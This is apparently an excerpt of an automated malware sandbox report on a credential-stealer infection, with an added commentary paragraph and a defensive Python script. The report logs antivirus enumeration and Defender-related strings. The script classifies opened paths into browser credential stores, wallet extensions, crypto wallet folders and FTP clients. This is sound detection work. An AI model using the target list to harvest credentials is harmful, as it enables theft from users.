Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2D42.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E87EE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 19_2_6C8E87EE
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match File source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vm.exe PID: 2484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vm.exe PID: 2004, type: MEMORYSTR
Source: vm.exe, 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: MSASCui.exe
Source: lm.exe, 00000014.00000003.2839163970.000000000054E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: vm.exe, 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: procexp.exe
Source: lm.exe, 00000014.00000003.2840894062.0000000003119000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2884414259.000000000311A000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2851808320.0000000003117000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2836416344.0000000003117000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: vm.exe, 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: MsMpEng.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
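The two WMI entries above and the long run of "File opened" entries in the next section are the most actionable part of this report for a defender: a ROOT\SecurityCenter2 query for AntiVirusProduct is how the payloads learn which AV is registered before deciding how to behave, and the file list is the stealer's target set (Chromium Login Data, Cookies, Web Data and History; Firefox key4.db, logins.json, cert9.db and the SQLite stores; Local Extension Settings folders for wallet extensions; desktop wallet and FTP-client directories). The image names matter as much as the targets: lm.exe and vm.exe live in a user Temp directory, and BitLockerToGo.exe is a signed Windows binary that has no reason to enumerate AV products or open Exodus and Coinomi wallet folders, which is consistent with the report's "System process connects to network (likely due to code injection)" signature. The following script is an added example, not code from Joe Sandbox or from the report: it parses lines in the report's own "Source: <image> <event>: <detail>" shape, classifies each opened path into a stealer category, records SecurityCenter2 AV enumeration per process, and flags processes whose location does not fit the behaviour. The sample lines are a constructed subset copied in the shape of the entries on this page; the category names, the directory lists and the location heuristics are this example's assumptions, not anything the sandbox defines.

```python
"""Turn Joe Sandbox-style behaviour lines into per-process stealer / AV-evasion indicators."""
import re
from collections import Counter, defaultdict

# Constructed sample: a subset of lines in the same shape as the report entries above.
SAMPLE_LINES = [
    r"Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct",
    r"Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct",
    r"Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn",
    r"Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json",
    r"Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet",
    r"Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPRush",
    r"Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation",
]

# "Source: <image path ending in .exe> <event>: <detail>" as the report prints it.
LINE_RE = re.compile(
    r"^Source: (?P<image>.+?\.exe) "
    r"(?P<event>WMI Queries|File opened|Queries volume information|Key value queried): "
    r"(?P<detail>.*)$"
)

# Target sets below are assumptions drawn from the File opened entries in this report.
CHROMIUM_STORES = {"login data", "login data for account", "web data", "cookies", "history"}
FIREFOX_STORES = {"key4.db", "logins.json", "cert9.db", "cookies.sqlite",
                  "places.sqlite", "formhistory.sqlite", "prefs.js"}
WALLET_DIRS = ("exodus", "electrum", "electrum-ltc", "coinomi", "ledger live",
               "bitcoin", "binance", "com.liberty.jaxx", "guarda", "atomic")
FTP_DIRS = ("ftpgetter", "ftpinfo", "smartftp", "ftpbox", "ftprush", "3d-ftp")
# Chrome extension IDs are 32 characters drawn from a-p.
EXT_ID_RE = re.compile(r"\\local extension settings\\[a-p]{32}$")
STEALER_CATEGORIES = {"browser_credentials", "browser_extension", "crypto_wallet", "ftp_client"}


def parse_line(line):
    """Return {'image', 'event', 'detail'} for a report line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify_target(path):
    """Map an opened path to a stealer category ('other' when it is not a known target)."""
    p = path.lower()
    parts = p.split("\\")
    name = parts[-1]
    if "\\user data\\" in p and name in CHROMIUM_STORES:
        return "browser_credentials"
    if "\\mozilla\\firefox\\profiles\\" in p and name in FIREFOX_STORES:
        return "browser_credentials"
    if EXT_ID_RE.search(p):
        return "browser_extension"
    if any(d in parts for d in WALLET_DIRS):
        return "crypto_wallet"
    if any(d in parts for d in FTP_DIRS):
        return "ftp_client"
    return "other"


def summarize(lines):
    """Per image: a Counter of opened-target categories and whether it enumerated AV products."""
    summary = defaultdict(lambda: {"categories": Counter(), "av_enum": False})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = summary[rec["image"]]
        if rec["event"] == "File opened":
            entry["categories"][classify_target(rec["detail"])] += 1
        elif rec["event"] == "WMI Queries":
            d = rec["detail"].lower()
            if "securitycenter2" in d and "antivirusproduct" in d:
                entry["av_enum"] = True
    return dict(summary)


def suspicious_images(summary):
    """Flag images that touched stealer targets or enumerated AV, with a location verdict."""
    findings = []
    for image, entry in summary.items():
        hits = {c: n for c, n in entry["categories"].items() if c in STEALER_CATEGORIES}
        if not hits and not entry["av_enum"]:
            continue  # volume queries alone (cmd.exe here) are not interesting
        lo = image.lower()
        if lo.startswith("c:\\windows\\"):
            where = "Windows system binary (process injection suspected)"
        elif "\\appdata\\local\\temp\\" in lo:
            where = "binary in user temp directory"
        else:
            where = "other location"
        findings.append((image, where, hits, entry["av_enum"]))
    return findings


if __name__ == "__main__":
    for image, where, hits, av in suspicious_images(summarize(SAMPLE_LINES)):
        print(f"{image}\n  {where}; av_enum={av}; targets={dict(hits)}")
```

On a real host the same classifier can be pointed at Sysmon Event ID 11/23 paths or EDR file-open telemetry instead of sandbox lines; the "Windows system binary opening wallet and credential stores" verdict is the part worth turning into a standing rule, since the Temp-dropped binaries change name between campaigns while the injection host and the target list do not.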

Stealing of Sensitive Information

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 9.2.EF14.exe.7ff71bc40000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.EF14.exe.7ff71bc40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2570610433.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.2414575122.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: EF14.exe PID: 3868, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\EF14.exe, type: DROPPED
